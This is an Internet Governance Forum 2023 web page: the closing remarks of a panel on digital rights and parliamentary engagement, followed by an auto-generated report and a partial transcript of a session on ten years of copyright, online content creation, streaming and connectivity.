Great. Camilo? Okay. I know we don’t have so much time.

Internet Bolivia Foundation:
So I would just like to say that I truly believe in the community level working. And I would like just to highlight what the Honorable Minister says. I think we should have key champions in some issues. But also, I think we should have municipality or local communities champions in some special topics. And that can be a really nice way to work and show other local communities how some nice regulations could be done.

Fernanda Kalianny Martins Sousa:
Final word to Fernanda. Oh, gosh. Really good questions. I think one of the challenges that we have is to connect international, national, and local levels. So at Internet Lab in the last year, because of the elections, we had the opportunity to have part of articulation room against disinformation. And I think it was really important because in this articulation, we don’t have only digital rights organizations, but also different ONGs related to human rights in general in the country. And considering the size of Brazil, we know that it’s not enough that people in Sao Paulo or Rio de Janeiro are talking about digital rights. in the process to approve laws and regulate platforms. So when we work together with CSOs of different fields in the country and different fields in the global South, I think we have the opportunity to pushing for laws, but not only pushing to pressure the big techs, pressure the different companies that are affecting our way of life. So one example to finalize is the law that we have in Brazil against political gender-based violence. And we are using all the structures that the state give us. And so, for example, we have a min-reform each year, not each year. After the election, we have a min-reform and election min-reform. And we are trying to approve in this min-reform some points related to this law that is connected also to hate speech online against women. So we are trying all the time occupy the structures that exist and create new structures. And I think it’s not possible if we don’t work together with different stakeholders. So thank you, Nick. Thank you guys.

Nick Benequista:
Look, thanks very much to our panelists today. I have to say, this is my first IGF and I’m a little biased, but I feel like this panel has given me a little bit of hope. There’s a lot of really amazing work. It’s really substantive. It’s very specific. There’s real results here. And for my colleagues at CIPE, SEMA, NDI, obviously you can be in touch directly with the panelists up here, but is there some way to kind of stay in touch with this conversation about parliamentary engagement? How should people, what should they be looking out for, I suppose? Any final recommendations from our colleagues on how to stay in touch? Hello? This is Daniel O’Malley from the Center for International Media. assistance. And yeah, I think this is a really great panel. I learned a lot listening. And I think if people are interested in this type of engagement with parliamentarians and policymakers at the national, international and local level, just reach out to me or come talk to Anna, because this is a topic that we’re quite interested in, because we think that it is an opportunity to promote digital rights in this broader context where we know that internet freedom is slipping. And so we need to work on all levers of government and to, as Fernando was saying, use the mechanisms we have and create new mechanisms. So yeah, I would say just reach out to us and stay in touch. And thank you everyone for showing up at 8.30 in the morning. Indeed. And to those online, thanks for joining as well. We had a pretty good number of participants. So look, round of applause for our panelists and for yourselves. Thanks very much, everybody.

Internet Bolivia Foundation

Speech speed

190 words per minute

Speech length

1642 words

Speech time

519 secs

Audience

Speech speed

164 words per minute

Speech length

826 words

Speech time

303 secs

Fernanda Kalianny Martins Sousa

Speech speed

126 words per minute

Speech length

1183 words

Speech time

565 secs

Liza Garcia

Speech speed

162 words per minute

Speech length

1146 words

Speech time

424 secs

Nick Benequista

Speech speed

182 words per minute

Speech length

1841 words

Speech time

607 secs

Sarah Opendi

Speech speed

158 words per minute

Speech length

1895 words

Speech time

720 secs

A Decade Later-Content creation, access to open information | IGF 2023 WS #108

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Online Moderator

Young producers in certain areas of the global South have successfully accessed the copyright framework, enabling them to develop professional content and enhance the value of intellectual property within their companies. This has allowed them to fund employee payment and content development. These young producers have mastered the necessary knowledge to support their activities in professional content production.

Local content creation in minority languages contributes significantly to cultural and linguistic diversity. Companies in Uganda, for example, create content in local languages that reflect people’s lives, ensuring representation and preventing the marginalisation or disappearance of these languages. It highlights the importance of using local languages for content creation to maintain cultural and linguistic diversity.

However, there is a significant disparity between broadband pricing and the spending power of local people. This issue arises when locals exhaust their data bundles before finishing a series, indicating a problem with supply and demand adequacy. Additionally, the quality and reliability of the signal pose challenges to accessing affordable and reliable broadband services. These factors limit digital access and create inequalities in internet access.

To address these challenges, it is necessary to continue deploying reliable infrastructure with a range of pricing options. This ensures digital inclusion and equitable access to affordable and reliable broadband services. Expanding the infrastructure and offering different pricing options reduce the digital divide.

Content creators face the struggle of finding a sustainable model to continue their mission of educating and engaging people on various social issues. If creators fail to find buyers in the streaming environment, they may experience market failure, leading to potential loss of valuable content.

The entry of large American streamers into some markets has triggered competition, providing content creators with more opportunities for funding. Increased competition expands the market and offers content creators additional avenues for financial support. This positive development empowers creators to seek funding from a wider range of sources, leading to more diverse and varied content.

Believing in the potential of sustainable audiovisual production businesses at the SME level, it is acknowledged that local content creators can address different market segments based on the local cultural and socioeconomic factors. This indicates the viability of building sustainable businesses in the audiovisual production industry, even at the SME level. By catering to specific local markets, content creators can create career tracks that align with the unique needs and interests of their target audience.

In conclusion, accessing the copyright framework and developing professional content allows young producers to build the value of intellectual property within their companies. Local content creation in minority languages contributes to cultural and linguistic diversity. The mismatch between broadband pricing and the spending power of local people hinders digital inclusion. Continued efforts are required to deploy reliable infrastructure with affordable pricing options. Content creators strive to find sustainable models to continue their impactful work, and the presence of large American streamers triggers competition, expanding funding opportunities. Building sustainable audiovisual production businesses at the SME level is seen as a promising avenue, offering the potential to address different market segments and create career tracks based on local cultural and socioeconomic factors.

LANTERI Paolo

The analysis of the arguments regarding copyright law and its impact on various industries reveals several key points. Firstly, copyright has adapted to technological advancements, allowing users unprecedented access to a wide range of content. Users now have the ability to access numerous fields of content, including music, sports events, user-generated content (UGC), and news. While not everything is perfect, copyright has successfully evolved to keep pace with technology.

Secondly, the content creator industry is in better shape than it was a decade ago. However, there are differences between sectors such as music, press, video games, and others. Despite these variations, the overall situation is more positive compared to ten years ago. The industry has experienced growth and improvement, suggesting that copyright protection has played a role in supporting the industry’s development.

Thirdly, copyright laws have evolved and become more flexible in recent years. Many countries, including the US, Australia, UK, South Africa, and Nigeria, have made significant changes to their copyright norms. These changes reflect a recognition of the need to update copyright legislation to accommodate technological advancements and address the challenges posed by the digital landscape.

Furthermore, copyright has proven its ability to serve diverse initiatives such as open access, open-source licensing, and user-generated content. This was seen as a challenge a decade ago, but it has now been demonstrated that copyright is flexible enough to support these initiatives. Platforms like TikTok, Meta, and Vista now enable legal user-generated content, despite disagreements over monetisation.

Another notable finding is that streaming, which was initially thought to destroy the music industry, now constitutes a significant part of the music market. In 2013, streaming was seen as a threat, but currently, 63% of the music market is digital. This highlights the transformative impact of streaming and its role in reshaping the music industry.

The analysis also suggests that the North-South debate in terms of content creation and cultural production is outdated. Countries in the Global South, including Brazil, Cuba, Indonesia, South Korea, and various African countries, are creating and exporting meaningful cultural and creative content. This challenges the traditional power dynamics of content production, showcasing the growth and diversity of creative industries in these regions.

Technology has played a crucial role in enabling access to local content, education, news, and serving the language diaspora. People can now easily access top-notch content produced in their home countries, facilitated by advancements in technology and content accessibility.

It is highlighted that maintaining copyright protection is critical to incentivise investment in professionally created content. Without copyright, the investments made in producing high-budget films, video games, and paying journalist salaries would be undermined.

Copyright laws are also shown to play a significant role in safeguarding the sports and gaming industry. As the industry has grown rapidly in the past decade, copyright laws have provided crucial control and protection for sports events, ensuring that the industry remains financially viable and sustainable.

Notably, there is a blurring demarcation between producer and distributor, with platforms like Netflix producing and distributing their own content. This blurring of roles raises important questions about the relationship between creators, distributors, and consumers in the digital era.

The analysis also reveals the importance of engineers in operationalising business deals and implementing technological advancements. Engineers are crucial in managing complex tasks such as revenue sharing and user identification, which are essential for the success of digital enterprises.

Additionally, the analysis highlights the need to protect youth creators and their works from being exploited without their consent or attribution. Copyright laws provide this protection, although effective enforcement relies on the use of appropriate technologies.

The analysis further demonstrates that user-generated content and derivative works are often covered and regulated by platforms’ terms of use. Platforms like TikTok, Instagram, and Meta have practices in place to address copyright concerns and ensure compliance with copyright laws.

Another insightful finding is that translation of literature requires permission from the author, as translation becomes a derivative work that can be commercially exploited. While some see translation as a financial opportunity, others emphasise its role in spreading knowledge and cultural exchange.

Regarding the issue of subscription fee stagnation versus increased content, it is highlighted that the current model may not be sustainable. Digital media services have been offering more content while keeping subscription fees similar for over a decade. This raises questions about the long-term viability of this business model.

In conclusion, the analysis demonstrates that copyright law has evolved and adapted to technological advancements. It has facilitated access to a wide range of content and has contributed to the growth and development of various industries. However, there are still challenges and areas for improvement. The findings highlight the need to continue updating copyright legislation, protecting the rights of creators, incentivising investment in professionally created content, and ensuring a fair and sustainable digital environment for all stakeholders.

Geoff Huston

In the last decade, the Internet has undergone a significant transformation due to the evolution of mobile phones and their convenience. Mobile telephony has surpassed traditional telephony, leading to a transformation of the Internet. With the introduction of mobile Internet devices, such as the iPhone, the Internet has evolved from a library to a thriving entertainment business.

This transformation has resulted in a booming global market of internet users, with billions of people now connected to the Internet. The network infrastructure has been rebuilt using content distribution techniques, ensuring that content is readily available to users, making access to content more convenient than ever before.

However, despite these advancements, the Internet has not evolved into the egalitarian platform initially envisioned for content creation. Instead of empowering individuals to become content publishers, the Internet has given rise to powerful intermediaries, such as Google and Akamai, who aggregate, license, and distribute content. These intermediaries dominate the industry by delivering uniform content to a global market.

The digital content industry is highly unpredictable and constantly reinvents itself every five years. Rapid technological advancements render business plans quickly outdated. This fluid environment poses both challenges and opportunities for businesses in this industry.

It is important to note that the Internet was built as a market response rather than a universal service. Unlike the telephone system, which prioritized universal service, the development of the Internet was driven by market demand. This approach has resulted in a focus on targeting higher-income consumers who are perceived as more lucrative for the tech industry.

However, there is hope for a more universal access to the Internet in the future. Advancements in technology have made it cheaper and more accessible, potentially enabling broader internet access. Initiatives such as Starlink, which aims to provide high-speed connectivity to remote areas, are bridging the digital divide.

Other projects, like Project Kuiper, are also using space spectrum to provide internet coverage. These projects, combined with technological innovations, have the potential to improve internet coverage in rural and remote areas.

The digital industry offers the ability to customize and diversify products and services within a larger ecosystem. Unlike traditional industries like the auto and telephone industries, which scaled through uniformity, the digital industry allows for personalized offerings to individual markets.

In conclusion, the evolution of mobile phones and their convenience have transformed the Internet and expanded its user base. However, challenges remain in terms of content distribution and ensuring equal access for all. Technological advancements, initiatives like Starlink, and ongoing projects offer hope for bridging the digital divide and making the Internet more accessible to everyone. Additionally, the digital industry opens up opportunities for customization and diversity, creating a dynamic and fast-paced landscape.

Stella Anne Ming Hui Teoh

Device sharing has become a significant barrier to network access in Malaysia during the COVID-19 pandemic. Many households have been forced to share just one device due to limited resources, resulting in connectivity issues. Usage prioritisation within households further exacerbates the problem, as it determines who gets access to the device. This unfortunate circumstance has had a negative impact on individuals’ ability to stay connected and engaged during these challenging times. The situation has hindered SDG 4 (Quality Education) and SDG 10 (Reduced Inequalities).

In relation to copyright concerns, there is worry about the lack of recognition and credit for content created by young individuals and shared online. Original content created by youth often becomes part of larger programs through algorithms, but the creators may not receive appropriate credit for their work. These issues raise concerns about intellectual property rights and the fair treatment of young content creators, undermining SDG 10 (Reduced Inequalities) and SDG 8 (Decent Work and Economic Growth).

While Japan’s influence on Southeast Asia’s copyright and intellectual property laws is neutral, it is important to acknowledge the impact Japan has had in shaping these laws, particularly in relation to SDG 16 (Peace, Justice and Strong Institutions).

During the COVID-19 pandemic, an online presence has offered significant opportunities for connection. However, there is growing concern regarding unethical practices such as the translation and monetisation of someone else’s intellectual content by digital natives. Some individuals take advantage of the online space by appropriating intellectual work without official approval. This unethical translation and monetisation of others’ content raises discussions about plagiarism, improper crediting, and fairness in the digital world. These issues hinder SDG 8 (Decent Work and Economic Growth) and SDG 16 (Peace, Justice and Strong Institutions).

In conclusion, device sharing poses a major hurdle to network access in Malaysia during the COVID-19 pandemic. Concerns about copyright and credit for content created by young individuals have emerged. Japan’s influence on Southeast Asia’s copyright and intellectual property laws remains neutral but noteworthy. Additionally, unethical translation and monetisation of intellectual content by digital natives is a growing concern. Efforts are needed to address these issues, ensuring fair access to network resources, protecting intellectual property rights, and promoting ethical practices in the digital sphere.

Moderator

Over the past decade, the growth and success of internet video have been remarkable. Streaming services have become easily accessible, and live streaming has become possible, allowing people to share moments in real-time across great distances. This advancement in technology has made streaming video over the internet a common practice that can be done by anyone without needing permission or specialized equipment.

The management of IP rights has also witnessed significant progress over the past decade. Initially, there were concerns about how IP rights would be managed in the digital age. However, efficient and effective collaboration among stakeholders has led to improved IP rights management. Stakeholders, who initially had conflicts, have come together to ensure the proper management of IP rights, leading to a positive outcome.

Copyright laws have successfully evolved with the internet and have adapted well to the digital revolution. Many believed that copyright would not withstand the digital revolution, but it has proved its strength. Users now have unprecedented access to a wide range of content, and legislative reforms have taken place globally to adapt copyright to the digital landscape. Copyright laws have succeeded in incentivizing the creation of content and ensuring access to it. The copyright system has not only withstood the digital revolution but has also contributed to the growth of user-generated content, open access, and streaming.

The shift in content creation over the past decade has been drastic. Content is no longer a monolith, and everyone now has the ability to create content. The tools to create content have multiplied exponentially, including AI tools and augmented reality. This shift has resulted in a diverse range of content being produced and made available on the internet.

The relationship between the internet and copyright has been collaborative. Despite initial concerns and challenges, the internet and copyright have managed to coexist and maintain a healthy relationship. Both have found ways to adapt and work together, ensuring the protection of intellectual property while allowing for the free flow and accessibility of content.

Efforts to improve the internet for efficient content creation and consumption have been ongoing. Users now demand more interactive content, particularly video, which has led to the need for more efficient networks. The work on making the internet more efficient has been a priority in the past decade.

However, challenges still remain. The digital divide continues to exist, with developing nations lacking the necessary infrastructure for widespread and quality internet access. Internet connectivity is a critical aspect of content creation, and without robust infrastructure, the global South struggles to effectively create and upload content to the internet.

The industry has seen rapid transformation due to technological advances. The sports and gaming industries, in particular, have gained a wider global audience. The video games industry, in particular, has experienced significant growth, with revenue projections of over 200 billion US dollars this year. The success of these industries is closely tied to intellectual property rights, and their business models have shifted from hardware-based to online, global, interactive gaming.

Throughout the discussions, there was an emphasis on the role of first responders and engineers. Their contributions to the industry were highly appreciated, and there were calls to give them more recognition and appreciation. Moreover, there were discussions about the need for more resilient networks in the Global South to support content creation and ensure equal access to the internet.

In conclusion, over the past decade, there have been significant advancements in internet video, IP rights management, and copyright laws. The shift in content creation has been remarkable, with the internet and copyright successfully coexisting and adapting to changes in the digital landscape. Efforts to improve the efficiency of the internet for content creation and consumption have been ongoing. However, challenges such as the digital divide and the need for better copyright protection remain. The industry has been transformed by technological advances, and the sports and gaming industries have gained a wider global audience. The contributions of first responders and engineers were highly appreciated, and there were calls for more resilient networks in the Global South. Overall, the discussions highlighted the progress made in various aspects of the industry and the importance of continued collaboration and innovation.

Konstantinos Komaitis

The relationship between the internet and copyright has proven to be healthy and adaptable, despite occasional disputes. Both entities have managed to coexist and adapt in the evolving environment. Despite initial concerns that the internet would harm copyright, it has been demonstrated that they can work together.

Content creation has become more accessible to everyone, thanks to technological advancements. Tools such as AI and augmented reality have opened up new possibilities for creators. User-generated content and influencer content are now integral parts of the copyright regime, which was once exclusive. This expansion of content creation has led to a more diverse and inclusive network.

Connectivity availability is a crucial factor in content creation. In order to create content, individuals need access to the internet. The increasing availability of smartphones has made it easier for more people to create content due to improved internet access. However, there is still a significant digital divide that needs to be addressed, particularly in the Global South. In order to foster more content creation in these regions, resilient networks and improved connectivity are necessary.

Industries and policymakers should take into account user demand and adapt accordingly. The evolution of technology and policy in the internet industry is largely driven by the demands and preferences of users. It is essential to listen to these demands and innovate accordingly to meet the needs of users. This user-centric approach contributes to the overall development and success of the internet industry.

The market will ultimately determine the survival of streaming services. Competition in the streaming industry is fierce, and the content offered plays a significant role in determining the success or failure of such services. Subscription service prices are also factors that influence the market. Some services may thrive and attract a large user base, while others may struggle to survive or even collapse quickly. The capacity to support the content being sold is another critical factor in the long-term sustainability of streaming services.

In conclusion, the relationship between the internet and copyright is dynamic. Despite occasional tensions, both entities have managed to coexist and adapt together. Technological advancements have made content creation more accessible, but connectivity still remains a challenge, particularly in the Global South. Taking into account user demand is crucial for industries and policymakers to stay relevant and meet the needs of users. Ultimately, the market will determine the survival of streaming services, with content and engineering playing a significant role in their success.

Glenn Deen

The internet has made significant advancements in handling video content over the past decade. Initially, there were only a few streaming services and video was primarily for thousands of viewers, not millions. However, as the demand for video content increased, more data was required. Today, video over the internet is commonplace and does not require special permissions or setups. Additionally, live streaming capabilities have allowed people to broadcast their experiences in real-time, opening up a new frontier in video over the internet.

While video on demand has made progress, live video over the internet still has room for growth. Examples of live broadcasting include sporting events or personal moments like a child’s soccer game. This indicates that there are opportunities for further development in this area.

The evolution of the internet has positively impacted the content creation and distribution industries. It has become a platform for next-generation streaming, with the quality of video evolving from standard definition to high definition and now 4K. Improvements in codecs and network transports have increased efficiency and reduced latency, providing a better user experience.

Efforts have been made to bridge the North-South divide in internet infrastructure, but more improvement is needed. The internet has been re-engineered to scale inclusively and allow diverse interactions for content creators.

The continuous evolution of internet technologies presents exciting opportunities and challenges. While investments in these technologies have resolved previously feared problems, new challenges such as latency have emerged. However, innovation in IP networks and frameworks has allowed businesses to thrive and adapt.

The user base of the internet has expanded, shifting from primarily computer scientists to a wider spectrum of creators, viewers, and market participants. This evolution has changed who the internet is designed for and has led to market frameworks that encourage exchange and payment for content.

The internet has made content creation more accessible and affordable. New tools, such as smartphone applications, have allowed for cinematic-quality video capture and processing, eliminating the need for expensive professional equipment.

Glenn Deen, one of the trustees managing the copyrights on all technical standards produced by the ITF, highlights pre-enabled translation permissions for ITF standards. This supports the translation and free access to informational resources, aligning with the goals of quality education and reduced inequalities.

Overall, the internet has successfully scaled to handle video content and has positively impacted various industries. While live video broadcasting still has room to grow, the evolution of internet technologies presents both opportunities and challenges. The user base has expanded, and market frameworks have emerged for content exchange and payment. Additionally, the internet has made content creation more accessible and innovations have facilitated the translation and free access to informational resources.

Audience

The discussions centred around different aspects of internet and technology, emphasising the importance of considering users’ needs and desires when improving these areas. One major concern highlighted was the lack of access to high-quality connectivity, especially in underserved areas. It was noted that approximately 2.6 billion people are still without internet access and meaningful connectivity, which highlights the existence of a digital divide that needs to be addressed.

Mobile technologies, particularly smartphones, were identified as crucial devices for rural communities to access digital content and resources. In Kyrgyzstan, for example, while there is limited access to computers, almost everyone uses smartphones. As a result, smartphone-friendly content, such as adjustable-font textbooks and lightweight videos, has been developed specifically for these communities, enabling them to access valuable information and educational materials.

The significance of localised content in the Kyrgyz language was also emphasised as an important factor in enhancing content accessibility and user-friendliness. Local stars were mentioned for voicing translated science materials, making them more user-friendly than the original versions. Prioritising the Kyrgyz language in content creation is essential for tailoring resources to the needs of the local community.

Copyright restrictions were identified as a major obstacle to digitising and sharing educational resources, particularly in Kyrgyzstan. While the Ministry of Education owns paid books, it does not hold the copyright, which belongs to the authors. Consequently, these copyright restrictions prevented the digitisation of existing textbooks for digital distribution, hindering the widespread dissemination of educational materials.

However, the utilisation of Creative Commons materials was recognised as a helpful solution in the absence of the ability to share copyrighted content. Due to copyright restrictions, finding copyright-free Creative Commons materials that could be translated into the Kyrgyz language was easier. These materials were sourced from globally available resources such as GSMA’s toolkit and Microsoft’s materials, enabling the creation of accessible and valuable content.

The impact of technology on content creation and consumption was deemed an important issue. The shift from the traditional library model of the internet to an entertainment model was discussed, highlighting the rapid technological advancements that consistently reshape the landscape every three to five years. The role of user-generated content and open-source platforms in shaping the market positively was also emphasised. However, concerns were raised about the cannibalisation of editorial intermediaries by platform intermediaries, prompting further examination of these dynamics.

One participant in the discussions questioned whether there is a failure in democracy rather than the market in relation to platform intermediaries. The critical role of platform intermediaries was stressed, along with speculation that these platforms may be contributing to the creation of social monads, potentially impacting societal dynamics.

The discussions also raised questions from the audience. One question addressed copyright rules on Instagram when uploading personal audio tracks to reels, indicating a concern about copyright infringement on social media platforms. Another question raised the issue of educating youth about copyright best practices, highlighting the need for efforts to raise awareness and promote responsible behaviours regarding intellectual property rights.

In conclusion, the discussions provided valuable insights into the challenges and opportunities related to internet and technology. Addressing the needs and desires of users, particularly in underserved areas, is crucial for improvement. The importance of mobile technologies and localised content in enhancing accessibility and user-friendliness was emphasised. Copyright restrictions posed obstacles to digitising and sharing educational resources, necessitating alternative solutions such as Creative Commons materials. The impact of technology on content creation and consumption, including concerns about platform intermediaries, democracy, content quality, and economic sustainability, called for further examination. Overall, the discussions shed light on the complexities and multifaceted nature of internet and technology-related issues.

Session transcript

Moderator:
Yep. Okay. All right. No. All right. We’ll just get started and we’ll have people join as they can, realizing we’re dealing with a global interest. Good morning, everybody. Thank you for joining our panel this morning. This is a discussion we had 10 years ago in IGF in Bali in 2013. I’m really excited to have it today, because there’s so much that has happened, and a lot of it we didn’t predict, but yet the Internet was happy to take on all the new excitement of the next 10 years that we had from 2013 to 2023, and we’re going to discuss how we’re going to manage it going forward. So the key questions we’re going to discuss today are where were we 10 years ago, where are we now, and where are we headed, and how is the forward planning that brought us into the healthy, vibrant ecosystem that we are currently enjoying going to bring us forward on this? So today on my panel, I have next to me Glenn Dean, who is a distinguished engineer at Comcast NBC Universal, Paolo Lanteri, who is at the World Intellectual Property Organization, and I’ve got Konstantinos, who is a nonresident fellow at the Atlantic Society and was a senior director at the Internet Society, and Jeff Houston is on… You can correct that if you need to. Jeff Houston is with the chief scientist at APNIC, who should be online joining us, and then eventually we’re going to come over to Stella over here, who is studying governance and policy and is with netmission.asia. So thank you all for joining us this morning. Let’s start off… Glenn, we’re going to start with you. So what have we learned in the past 10 years, and what do you think are the dominant issues that really helped the Internet and the network infrastructure grow in that 10 years?

Glenn Deen:
Thanks, Shane. Gee, that’s an interesting question. You know, 10 years ago when we did the Bali panel, it was really early days in terms of Internet video. We had… Some streaming services were popping up. We had sort of the initial foray into scaling the Internet to handle content with millions of viewers instead of thousands of viewers, and I think that looking back, we met those challenges pretty effectively. You know, despite dressing up today trying to blend in with the adults here at the IGF, I am an Internet engineer, and from an engineering perspective, we had a lot of challenges back then. Video takes a lot of data. Video is a lot of data, and as you add more video, you have even more data on the network, and as you add more video, you add more watchers, and that’s even more data on the network, and we’ve scaled the networks very effectively in the last 10 years to the point where we don’t really ask the question, can I do video over the Internet anymore? We don’t ask the question, can we do video easily between us? I can now walk down the street here in Kyoto, and I can live stream back to my family in Los Angeles. That’s remarkable that I can do that over the Internet, and I don’t have to ask anybody’s permission, and I don’t have to jump through a bunch of hoops, or I don’t need a crew to do it. I just use my phone, and that’s quite remarkable, so I think that looking back from where we were at 10 years ago to where we’re at today, it’s a success story from an engineering standpoint. That’s my area. That’s who I can talk to. We’ve succeeded. We’re not done. There’s new stuff ahead. One of the big changes that we’re going to be talking about, and I’ll talk about this a little bit later, is we’ve done a very great job at video on demand, which is typically prerecorded movies and television shows from a professional standpoint, and the next frontier is live stuff, live sporting events, live broadcasting your child’s soccer game to your grandparents who are at home in maybe another state or another country, and bringing live to the experience of streaming and video on the Internet, but we’ll talk about more of that in a few minutes, I think.

Moderator:
Great. Paolo, you have been working in this space for quite some time, and there was a lot of concern about how IP rights were going to get managed back then. It just seems like you have done a very efficient, effective job of getting the collaboration of a lot of people who didn’t want to get along 10 years ago. Talk about your success.

LANTERI Paolo:
Thanks. Thanks a lot. Good morning, everyone. I rarely start my intervention with an apology, but given the context, I must do that. On top of being an international civil servant, I’m a lawyer, an IP lawyer, so I try to keep myself understandable, and I’m heavily jet lagged, and it’s 8.35 in Japan. You do that to handicap the lawyers. So the situation 10 years ago was a completely different one. We were very cautious, and the best we could get out of that discussion was that copyright was still relevant for promoting content, but needed to adapt. Put it in other words, it was evolve or perish, basically. And among many people at the IGF, secretly or sometimes openly, I think the majority were sort of hoping towards, lagging towards the second option, like they were thinking that copyright was going to not resist to the technological evolution, or in any case could not stand through the evolution of the Internet. I think 10 years later, we can all agree at least on two points. We’re not saying everything is perfect, but copyright didn’t perish, still here, and users had as an unprecedented access to the widest variety of content in all sorts of fields, meaning even on like live music and sports events, UGC, news, fake or quality news, news, anything, anything. So basically we can, that’s already an answer, copyright didn’t stand in the way of the healthy development of distributional content. I’m not saying everything is perfect, but there are still many challenges, but copyright succeeded to deliver, continue delivering the mission of incentivizing creation of content, and therefore access to it, and went through this natural selection process, almost Darwinian memories, I think matured from many lessons learned, but also stronger and reinforced, because the content creator industry is in much better shape compared to 10 years ago. Here I must make a disclaimer that not industries are the same, so it’s not the same talking to the music industry than the press industry, or like publishing, or video games, of course, and among those sectors there are different players, so again, it’s not the same talking to music producer or assessment musician. How did we do that? Of course there was a development, an evolution that was much needed, it happened, it was revolutionary, and covered several aspects. One, from a norm-setting perspective, we had unprecedented changes in the norms, in legislation, nothing similar happened in the past. Copyright reforms were at the table of legislators all over the world for the, and still are, was a headache of legislator. Countless directives at European level, music modernization acting in the US, Australia, UK discussing one, South Africa, Nigeria just implemented one, Uruguay yesterday, countless everywhere, so the system had to evolve and is evolving, but the most extraordinary changes I think are in the way copyright is exercised and licensed, and so stakeholders made, sat down at the table and found a way to make things that were unworkable finally workable. I won’t dig into details now, but I’m happy to do it later, there are three, many success stories, three very well related to what was discussed ten years ago. One is open access, open source, open licensing and all that, I think it’s almost a settled issue, back then we were saying copyright is not fit for purpose, because there are so many open crowd initiatives going on, and IP is not serving those purposes. That was not the case, is not the case, because actually it’s flexible enough to make it happen, plus limitations and exceptions. I want, I mean, happy to develop on that. User generated content, literally there was one of the outcomes of 2014 IGF was UGC, user generated content is a non-resolvable issue, it’s showcasing how copyright and reality are completely displaced and mismatched. Why? Because for any one of us taking a video and synchronising a song or modifying a picture found on the internet entails a number of copyright exclusive rights, so you need to ask the permission to do that, individually, back then it was individual, you want a piece of music on your video, you need to go and knock on the door of the producer to get that. Similar, you get a picture online, you need to ask the permission to do that. So we’re saying it’s not going to work, and rights holders say yeah, but you cannot do that. Ten years from now, we have TikTok, we have Meta, we have Vista, we have countless UGC services that are legal and we can discuss, people are unhappy about how much money they’re getting, but that’s another issue. So copyright showed it can be adapted, that’s a business bargaining power discussion. The other great success story is streaming, but it would give me, I mean I would need at least half an hour to end, but streaming in 2013 was like wow, it’s going to destroy the music industry, this cannot happen, and now the music industry is built up on, I mean over, I think it’s 63% of the music market is digital these days, and of course not everyone is equally happy, but things are working well from everyone, users and stakeholders. So I think those are the success stories and we can discuss more about the details of those changes and what’s next.

Moderator:
Thank you. We’ll probably come back to several of those issues. Constantino, you were on a panel yesterday that was talking about fragmentation, and I thought about it, and this came up as well, that some people’s fragmentation is actually just a distributed network, it depends on where you sit and where you’re thinking about this, and so in the ten years that we have been discussing this since 2013, how are the distribution networks faring on this, and are we getting into more challenges with governments because of what we just heard about with all this new content, or are the networks not affected by the fact that we just have lots of content and it’s making it where people want it to go?

Konstantinos Komaitis:
Hi everyone, and thanks for having me here. Just a small correction, I am no longer with the Internet Society, so just to make sure that this is on the record. So one of the things, I think that over the past ten years there have been a lot of lessons learned. I remember when I started ten years ago at the Internet Society, funny enough, I was hired to do copyright, and I was hearing that, you know, there were some strong voices that were claiming that we need to kill the Internet because it’s going to kill copyright, and of course this didn’t happen, and of course both copyright and Paolo is absolutely right, both copyright and the Internet are just it, and they found a way to collaborate, right? They found a way to coexist in a system that, and in an environment better yet, that is evolving so fast, and it’s changing so fast. And I was having a conversation with Glenn this morning, and we were talking about, oh, perhaps we, you know, could we have predicted the TikToks or the user-generated content that exploded, or the streaming services, and if we had predicted that, what we would have done. And we both concluded that it’s actually really good that we didn’t predict, because it demonstrates both the flexibility of copyright, as Paolo said, but also the ability of the Internet, you know, to bring us new challenges all the time, and adapt to those challenges. I think that what we’re seeing currently, and what is really fascinating for me, is that the way content is created has exploded, right? There is really not, content creation is no longer a monolith. In the old days, you had very specific actors that were creating content, and they were very much responsible for the distribution of this content, but right now, literally everyone is creating content, and the tools that allow you to create content have multiplied exponentially. So, AI tools, augmented reality, you have influencers that are creating content that are claiming copyright, you have all these different services that allow you to be part of this copyright regime that was so very much exclusive in the beginning, or before the Internet, and the early days of the Internet. Now, I think that networks had to adjust to that reality, and they had to figure out how to cope with exactly what Glenn said in the beginning. Video. Because that is where we are right now in terms of the Internet from a user perspective. Users want to stream. Users want to watch video. Users, I mean, you know, they want to have access to content that is as interactive as possible, right? And I think that this is going to accelerate as the new tools are coming in, so there is a very, very valid question, and I am very, you know, Glenn and I met ten years ago, practically, and ten years ago, he was telling me that I am working in order to make networks better and more efficient, so I saw him this morning, and I said, oh, what are you working these days? Literally, he said what I was working ten years ago. In the beginning, I was like, hmm, but then, you know, you realise that this is exactly what we need to be working on, right? How to create, how to make the Internet more efficient for users to create and consume video. Sorry, content, because not everybody wants to create content, but there is a lot of consumption, so we are at a place, I think, we are at a very interesting place where I have to admit, and I never thought that I would say that, we are seeing, you know, if copyright and the Internet were in a relationship, were in, you know, in the beginning, and they were not really getting along, right now, they’re sort of, you know, they have figured it out, they have their tensions, they have their marital problems, but they’re not divorced, which, for me, is a really, really healthy place to be in many different ways.

Moderator:
So we have a healthy relationship that is continuing to blossom. We were going to go to Geoff, did you need to get in there? Are you having an intervention already?

Glenn Deen:
Do I need to update my job description as marriage counselor?

Moderator:
Yes, perhaps. Perhaps, all right. That was a great action. Do we have Geoff online? Yes, yes, you do. Okay, fabulous. All right. Thank you for joining us today, Geoff. Sorry we’re not having you here in person. So you joined the gentleman here, but you are also, how are we doing technically? Have we done, has it survived as well as it feels like to the common user? It seems like the technical aspects of the Internet have just flourished, and you guys have been doing an amazing job on the back end, making sure all this content gets delivered to where it wants to go.

Geoff Huston:
